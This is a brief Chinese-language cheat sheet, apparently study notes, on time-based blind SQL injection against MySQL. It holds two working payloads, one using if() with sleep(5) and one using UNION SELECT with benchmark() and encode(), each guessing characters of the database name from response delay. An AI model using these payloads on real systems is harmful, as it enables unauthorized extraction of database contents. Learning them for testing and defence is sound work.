1.利用sleep() 函数进行注入
payload:and if(ascii(substr(database(),1,1))=115,1,sleep(5))%23
2.当错误的时候会有5秒的时间延时时利用benchmark()进行延时注入
payload:union select (if(substring(current,1,1)=char(115),benchmark(50000000,encode('MSG','by 5 seconds')),null)),2,3 from (select database() as current) as tb1%23
当结果正确的时候,运行 ENCODE('MSG','by 5 seconds')操作 50000000 次,会占用一段时间。